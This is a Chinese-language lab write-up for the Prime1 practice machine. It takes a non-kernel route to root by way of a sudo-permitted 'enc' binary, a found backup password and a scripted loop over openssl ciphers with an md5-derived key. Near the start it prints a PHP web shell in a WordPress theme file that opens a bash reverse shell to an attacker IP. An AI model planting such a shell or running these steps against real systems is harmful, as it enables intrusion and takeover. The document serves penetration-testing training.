Prime1 靶机渗透 ( openssl 解密 ,awk 字符串处理,信息收集)

news2024/11/15 8:02:48

简介

Prime1 的另一种解法

起步

从初级shell开始

反弹 shell 路径

http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php

其内的 shell 为

<?php eval("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'");?>

sudo ncat -lvnp 443 接收即可

在这里插入图片描述

尝试另一种解法

内核提权的手法相对暴力,对系统的稳定性有危害,漏洞容易被修复,所以考虑不使用内核提权的方法拿到 root

该说不说,ubantu 4.10.0-28 的内核很老

对 enc 很感兴趣
使用 strings 和 file 看不到
strings 用于从二进制文件中提取可打印的字符序列,file 用于确定文件类型

<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l                      
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home/saket
<ml/wordpress/wp-content/themes/twentynineteen$ cd /home/saket               
www-data@ubuntu:/home/saket$ ls -laih
ls -laih
total 36K
 536440 drwxr-xr-x 2 root root 4.0K Aug 31  2019 .
1048577 drwxr-xr-x 4 root root 4.0K Aug 29  2019 ..
 538264 -rw------- 1 root root   20 Aug 31  2019 .bash_history
 538263 -rwxr-x--x 1 root root  14K Aug 30  2019 enc
 536446 -rw-r--r-- 1 root root   18 Aug 29  2019 password.txt
 526540 -rw-r--r-- 1 root root   33 Aug 31  2019 user.txt
www-data@ubuntu:/home/saket$ strings enc
strings enc
strings: enc: Permission denied
www-data@ubuntu:/home/saket$ file enc
file enc
enc: executable, regular file, no read permission
www-data@ubuntu:/home/saket$ 

这里需要依靠经验,enc 应当和 openssl 有关

如果要四处找找,就用 find 查找 *backup*。这里的文件名 backup 是由经验来的,或者是靶机作者的命名习惯

www-data@ubuntu:/home/saket$ find / -name '*backup*' 2>/dev/null

内容很多,挑出一些特殊的文件名

/var/backups
/opt/backup
/opt/backup/server_database/backup_pass

再四处看看

在位置 /opt/backup/server_database/backup_pass 文件中看到内容,是一个密码
backup_password

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /opt/backup
<ml/wordpress/wp-content/themes/twentynineteen$ cd /opt/backup               
www-data@ubuntu:/opt/backup$ ls -liah
ls -liah
total 12K
414037 drwxr-xr-x 3 root root 4.0K Aug 30  2019 .
393218 drwxr-xr-x 3 root root 4.0K Aug 30  2019 ..
414038 drwxr-xr-x 2 root root 4.0K Aug 30  2019 server_database
www-data@ubuntu:/opt/backup$ cd server_database
cd server_database
www-data@ubuntu:/opt/backup/server_database$ ls -liah
ls -liah
total 12K
414038 drwxr-xr-x 2 root root 4.0K Aug 30  2019 .
414037 drwxr-xr-x 3 root root 4.0K Aug 30  2019 ..
414108 -rw-r--r-- 1 root root   75 Aug 30  2019 backup_pass
414042 -rw-r--r-- 1 root root    0 Aug 30  2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is 

"backup_password"


Enjoy!
www-data@ubuntu:/opt/backup/server_database$ 

这里总结一下查找的技巧,find / -name ‘*backup*’
find / -name ‘*pass*’ 也能
bash 中把错误输出扔垃圾桶 2>/dev/null
输出使用 | less 方便观察

执行密码试一试,加上sudo 的执行结果不一样。通过观察发现是用 cp 拷贝了一些文件

www-data@ubuntu:/home/saket$ ./enc 
./enc
enter password: backup_password
good
/bin/cp: cannot stat '/root/enc.txt': Permission denied
/bin/cp: cannot stat '/root/key.txt': Permission denied
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$ 

推测这两个.txt 从/root 拷贝到 /home/saket 中

www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
www-data@ubuntu:/home/saket$ 

通过观察 enc.txt 是一个 base64 。key.txt 提示要把 ippsec 转成 md5,然后再做一个什么事

这里要凭借经验,和 openssh 相关的经验

用 kali 操作转md5

┌──(kali㉿kali)-[~]
└─$ sudo echo -n 'ippsec' | md5sum
366a74cb3c959de17d61db30591c39d1  -
┌──(kali㉿kali)-[~]
└─$ sudo echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}' 
366a74cb3c959de17d61db30591c39d1

捣鼓 openssl 的加密

先看一看 openssl 的加密方式
主要关注 Message Digest 和 Cipher commands 的内容

┌──(kali㉿kali)-[~]
└─$ sudo openssl -help                                     
help:

Standard commands
asn1parse         ca                ciphers           cmp               
cms               crl               crl2pkcs7         dgst              
dhparam           dsa               dsaparam          ec                
ecparam           enc               engine            errstr            
fipsinstall       gendsa            genpkey           genrsa            
help              info              kdf               list              
mac               nseq              ocsp              passwd            
pkcs12            pkcs7             pkcs8             pkey              
pkeyparam         pkeyutl           prime             rand              
rehash            req               rsa               rsautl            
s_client          s_server          s_time            sess_id           
smime             speed             spkac             srp               
storeutl          ts                verify            version           
x509              

Message Digest commands (see the `dgst' command for more details)
blake2b512        blake2s256        md4               md5               
rmd160            sha1              sha224            sha256            
sha3-224          sha3-256          sha3-384          sha3-512          
sha384            sha512            sha512-224        sha512-256        
shake128          shake256          sm3               

Cipher commands (see the `enc' command for more details)
aes-128-cbc       aes-128-ecb       aes-192-cbc       aes-192-ecb       
aes-256-cbc       aes-256-ecb       aria-128-cbc      aria-128-cfb      
aria-128-cfb1     aria-128-cfb8     aria-128-ctr      aria-128-ecb      
aria-128-ofb      aria-192-cbc      aria-192-cfb      aria-192-cfb1     
aria-192-cfb8     aria-192-ctr      aria-192-ecb      aria-192-ofb      
aria-256-cbc      aria-256-cfb      aria-256-cfb1     aria-256-cfb8     
aria-256-ctr      aria-256-ecb      aria-256-ofb      base64            
bf                bf-cbc            bf-cfb            bf-ecb            
bf-ofb            camellia-128-cbc  camellia-128-ecb  camellia-192-cbc  
camellia-192-ecb  camellia-256-cbc  camellia-256-ecb  cast              
cast-cbc          cast5-cbc         cast5-cfb         cast5-ecb         
cast5-ofb         des               des-cbc           des-cfb           
des-ecb           des-ede           des-ede-cbc       des-ede-cfb       
des-ede-ofb       des-ede3          des-ede3-cbc      des-ede3-cfb      
des-ede3-ofb      des-ofb           des3              desx              
rc2               rc2-40-cbc        rc2-64-cbc        rc2-cbc           
rc2-cfb           rc2-ecb           rc2-ofb           rc4               
rc4-40            seed              seed-cbc          seed-cfb          
seed-ecb          seed-ofb          sm4-cbc           sm4-cfb           
sm4-ctr           sm4-ecb           sm4-ofb           zlib              
zstd              

列出所有可能的 openssl 加密方式

sudo awk ‘{gsub(/ /,“\n”);print}’ CipherTypeRaw

┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq | wc -l
101

将这个东西存到一个文件里,方便后面用 bash 的 for 循环枚举

用 awk 处理前:

┌──(kali㉿kali)-[~/testPrime1]
└─$ cat CipherTypeRaw 
blake2b512        blake2s256        md4               md5               
rmd160            sha1              sha224            sha256            
sha3-224          sha3-256          sha3-384          sha3-512          
sha384            sha512            sha512-224        sha512-256        
shake128          shake256          sm3               
aes-128-cbc       aes-128-ecb       aes-192-cbc       aes-192-ecb       
aes-256-cbc       aes-256-ecb       aria-128-cbc      aria-128-cfb      
aria-128-cfb1     aria-128-cfb8     aria-128-ctr      aria-128-ecb      
aria-128-ofb      aria-192-cbc      aria-192-cfb      aria-192-cfb1     
aria-192-cfb8     aria-192-ctr      aria-192-ecb      aria-192-ofb      
aria-256-cbc      aria-256-cfb      aria-256-cfb1     aria-256-cfb8     
aria-256-ctr      aria-256-ecb      aria-256-ofb      base64            
bf                bf-cbc            bf-cfb            bf-ecb            
bf-ofb            camellia-128-cbc  camellia-128-ecb  camellia-192-cbc  
camellia-192-ecb  camellia-256-cbc  camellia-256-ecb  cast              
cast-cbc          cast5-cbc         cast5-cfb         cast5-ecb         
cast5-ofb         des               des-cbc           des-cfb           
des-ecb           des-ede           des-ede-cbc       des-ede-cfb       
des-ede-ofb       des-ede3          des-ede3-cbc      des-ede3-cfb      
des-ede3-ofb      des-ofb           des3              desx              
rc2               rc2-40-cbc        rc2-64-cbc        rc2-cbc           
rc2-cfb           rc2-ecb           rc2-ofb           rc4               
rc4-40            seed              seed-cbc          seed-cfb          
seed-ecb          seed-ofb          sm4-cbc           sm4-cfb           
sm4-ctr           sm4-ecb           sm4-ofb           zlib              
zstd   

用 awk 处理后:

┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq              

aes-128-cbc
aes-128-ecb
aes-192-cbc
aes-192-ecb
aes-256-cbc
aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
aria-128-ecb
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
aria-256-ecb
aria-256-ofb
base64
bf
bf-cbc
bf-cfb
bf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
camellia-128-ecb
camellia-192-cbc
camellia-192-ecb
camellia-256-cbc
camellia-256-ecb
cast
cast5-cbc
cast5-cfb
cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
des-ecb
des-ede
des-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
rc2-ecb
rc2-ofb
rc4
rc4-40
rmd160
seed
seed-cbc
seed-cfb
seed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
sm4-ecb
sm4-ofb
zlib
zstd
                                                                                                                 
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq | wc -l      
101

脚本模板

由上文得到的两个线索
enc 看起来是个 base64
key 提示把 ‘ippsec’ 转为md5,并和当前用户名 saket 做一个运算来获得真正的形式

cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

cat key.txt
I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

结合 openssl 的 enc 基本用法 (前文多次提到 enc ,结合经验推断为 openssl 的 enc 使用)
(截取部分内容,完整输出很长)

openssl enc -help 
General options:
 -help               Display this summary
 -e                  Encrypt
 -d                  Decrypt
Output options:
 -a                  Base64 encode/decode, depending on encryption flag
 -base64             Same as option -a
Encryption options:
 -K val              Raw key, in hex

思路就是,用 ‘ippsec’ 以 md5 加密 转为 hex 作为 密钥,解 base64 字符串

先处理 key,由于加密方式不确定,可以通过 bash 脚本枚举,使用先前处理好的用于枚举的文件

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1

od 的用法,简单来说 把一个字符串转成 hex 十六进制

工具 od,缩写前为 octal dump,linux 内置
-A, --address-radix=RADIX
output format for file offsets; RADIX is one of [doxn], for Decimal, Octal, Hex or None
-t, --format=TYPE
select output format or formats
-x same as -t x2, select hexadecimal 2-byte units

用起来是这个效果,0a 是个异常的换行符,用 tr 搞一下 (哪这么麻烦,直接用鼠标得了😓)

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | od -A n -t x1
 33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
 0a

用一下 tr ,-d 代表删除,现在把 0a 删掉了

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1 
 33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31

给他把换行删了,这样变成一行

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'
 33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31

用 tr 再删一下,把空格删掉,tr 做简单操作比较方便,用 awk 也可

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'| tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431 

用 awk 是这样换的 ( "茴"的四种写法 😓)

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'| awk '{gsub(/ /,"");print}'
3336366137346362336339353964653137643631646233303539316333396431

于是模板就写好了( -CipherType 不是标准命令,是个占位符,方便后面 for 循环用),接下来用 bash 脚本枚举

┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -CipherType -K 3336366137346362336339353964653137643631646233303539316333396431
for Cipher in $(cat CipherTypes);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done

似乎都是错的

┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done 
iv undefined
hex string is too long, ignoring excess
bad decrypt
80965B375F7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E657D43B7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80661A0C5D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6E66F967F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80669B95DA7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
80A63B7B067F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80C6FCF7E67F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80E6A5EBAA7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
80B6F7BB807F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
bad decrypt
8006A6E2B87F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
8096BC60B77F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80269F70C97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B643FE557F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80367C71A27F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
80367A18C97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
8036C695C57F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
80067B405E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8076BD49437F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80F69DACBB7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
hex string is too long, ignoring excess
enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
80D6FDCC567F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80F6B9693E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
808678DFBB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80168370F07F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80360108337F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80C60019407F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
8086D899647F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80365A9DFC7E0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
80164276447F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
8016E532F57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
80D62544897F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80C67DA9C87F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
8006C3FA077F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
805626F9E47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
8076FDCEF57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
8056FB9B5E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B6C24B237F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80C6586B737F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80465CBD487F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)

原来是 openssl 的 bug,把 echo 的 -n 取消就行

┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done

用这个,把错误信息丢掉,并打印加密的方式

for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431  2>/dev/null;echo $Cipher;done

┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431  2>/dev/null;echo $Cipher;done
aes-128-cbc
l{���[��7�ƏmfE��K����;0`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
                                                          �:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛaes-128-ecb
aes-192-cbc
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��|&�As
                  ��    �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o    {aes-192-ecb
aes-256-cbc
Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"

Victor,aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�aria-128-ecb           �?g�
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
<�▒�bØ�H�� TG
             \|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
                                                                                      �q�7w1|����s�;�d���/�S��▒7���%h��7�(
"yR����v�2�aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�>       �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��aria-256-ecb
aria-256-ofb
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�׿;j;f���YS1
                                                                                            �
��Ֆt7base64
bf
bf-cbc
bf-cfb
1�a��4�#�yQ.��H���
                  ��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K      �B�6M�ە�^vay��IQg
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σbf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
